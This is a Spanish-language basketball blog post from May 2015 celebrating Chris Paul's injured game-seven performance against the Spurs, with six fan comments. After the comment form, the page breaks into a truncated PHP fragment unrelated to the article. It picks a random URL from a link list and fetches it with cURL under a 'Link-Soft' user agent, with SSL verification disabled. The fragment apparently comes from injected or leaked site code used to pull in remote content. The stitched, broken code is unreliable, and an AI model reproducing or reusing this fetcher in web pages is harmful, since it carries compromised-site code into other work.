La Crónica: El cantar del Mío CP3

03 de May de 2015 por TheDeerHunter

Dice la leyenda que El Cid Campeador fue capaz de ganar batallas tras su muerte, falcado sin vida a lomos del mítico Bavieca, sólo por la inspiración que generaba su figura y el temor que causaba a sus rivales. Anoche vivimos una gesta baloncestística a la altura, con un Chris Paul visiblemente mermado que, sin embargo, fue capaz de hacer caer a los campeones vigentes. ¿Estamos hablando de la mejor primera ronda de la historia?

Sin lugar a dudas este séptimo choque del Spurs@Clippers de primera ronda ha sido la obra de arte por antonomasia de los playoffs en curso. Quedan tristes nuestros corazones por el hecho de que un campeón tan brillante como los Spurs sean profanados a las primeras de cambio, pero los Clippers han sido sutilmente mejores. El equipo de Popovic ha estado coqueteando con la tragedia toda la campaña y al final lo ha pagado. El mérito ha sido llevar esta serie hasta los últimos minutos del séptimo.

Pero vayamos a lo que vamos. Tras el “Flu game” de M. Jordan el partido de anoche pasará a la historia como el “Strain game” de Chris Paul. El partido más glorioso y épico de la historia de una franquicia destinada a perder. Una actuación que le hace eterno independientemente de lo que haga el resto de su carrera. También hace peligrar su concurso el resto de playoffs, pero que le quiten lo bailado.

Los Spurs llegaron al Staples como lo que son, unos campeones. Endosaron 30 puntos en el primer cuarto sólo como aperitivo, probando que aquello de la desventaja de campo no va demasiado con ellos. El choque fue de principio a fin un verdadero intercambio de golpes. Nada que ver con el Pacquiao-Mayweather que algún incauto se iba a tragar después. Las comparaciones son odiosas…

Si la cosa hubiera terminado de otra manera deberíamos estar loando a la vieja guardia de Popovic. El rendimiento de Tim Duncan es algo que sobrepasa nuestra capacidad de entendimiento. Además ayer vimos momentos excepcionales de Parker, Diaw y Manudo, como si el tiempo no hubiera pasado. Una manera de despedirse a la altura de sí mismos.

En frente, los Clippers supieron sobreponerse moralmente a la ausencia de Chris Paul. Le tocó dirigir a Jamal, y lo hizo con cierta solvencia. La descomunal actuación de Blake Griffin quedará eclipsada, pero ayer con su triple doble supo hacerse merecedor de la herencia que nos deja el mejor ala-pívot de la historia. Él fue el verdadero sustituto de CP3 como director de orquesta. También vitales nuevamente las aportaciones de dos secundarios como Barnes y Redick.

Pero el protagonista no pudo ser otro que Chris Paul. Cuando volvió cojeando a la pista algunos intuimos que algo muy grande iba a ocurrir. La realidad supera a la ficción y quizá nos retrotraimos al cine de nuestra infancia. Cada canastón superaba al anterior hasta llegar al final de infarto, que muchos tardaremos en olvidar.

Qué más se puede decir…

 

Comenta

6 comentarios a esta entrada

  1. oli dice:
    #1

    Acabó de ver el partido, sencillamente impresionante por partidos como el de anoche la nba es la mejor liga de baloncesto con mucha diferencia.
    Yo no soy de los clippers, me caen mal, pero les felicito han pasado una elimitoria gloriosa ante todo unos campeones como los spurs, pero esto no para y ya comienzan las semis de conferencia a disfrutar!!

      Citar

  2. Triceratops dice:
    #2

    Tremendo partidazo, en el que los Clippers merecidamente han pasado ya que a mi juicio, han sido mejores en 6 de los 7 partidos.
    Punto de inflexión para las dos franquicias; los Clippers dejan de ser unos perdedores históricos para al menos poder colgarse la medalla de que jubilaron a los Spurs con Paul tocadísimo y haciendo un excepcional juego, que como decís , pasará a ser una de las mejores primeras rondas de la historia. Creo que a pesar del cansancio, si Paul estuviese medio fino, se pueden ventilar a los Rockets, pero el escaso banquillo que tienen hace que vea imposible que puedan cargarse posteriormente a Warriors ó Grizzlies.

    Por los Spurs, creo que ahora sí, por fín, podemos ir sacando las palas y enterrar a este equipo, al menos con Duncan-Ginobili-Parker como Big 3. Lamentable serie del argentino y del francés, y peor aún la de Thiago Splitter, uno de los mayores pufos que ha visto la NBA en los últimos 5 años y sobrevalorado como él solo.

      Citar

  3. Ruxixón dice:
    #3

    Qué jodido espectáculo,una maravilla que pone la guinda a esta serie.De las mejores en mucho tiempo.Y absolutamente abrumador el partido de CP3,y de muchos otros -la serie de Griffin tremenda-,pero su actuación de hoy merecía ese broche de oro,con esos triples a una pierna,renqueante de su lesión y con el game winner.Enorme.

    ¡¡¡NO TE RETIRES TIM DUNCAN!!!!

      Citar

  4. GreenPride dice:
    #4

    Increible la serie y séptimo partido a la altura de ella. No se podía acabar de mejor manera.
    Partidazo de los que hacen afición y de los que pasan a la historia de la para mi mejor primera ronda de los PO que he visto.
    Los campeones cayeron con algo más que honor ante unos Clips que se colgaron a la heroicidad de un CP3 que mermado y todo hizo lo imposible para hacer pasar a su equipo. Los Spurs casi han ganado la eliminatoria con Parker, Manudo, Splitter muy por debajo de su mejor nivel y aun asi se les ha escapado en el ultimo segundo del último partido. Grandes los ya excampeones y enorme la serie de Duncan, mito entre los mitos que ha podido con DeAndre y hasta con Griffin en muchos momentos.
    Ahora todo depende del estado de CP3, si como parece no está out, los Clips aspiran claramente al anillo o al menos a pasar por encima de los Rockets.

      Citar

  5. Viva_Dirk dice:
    #5

    Con Chris Paul sano, los Clippers son mis favoritos al anillo.

      Citar

  6. Vader dice:
    #6

    Pude ver el partido en directo y era imposible despegarse del televisor. Partido de los que hacen afición con mayusculas. Tremendo!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>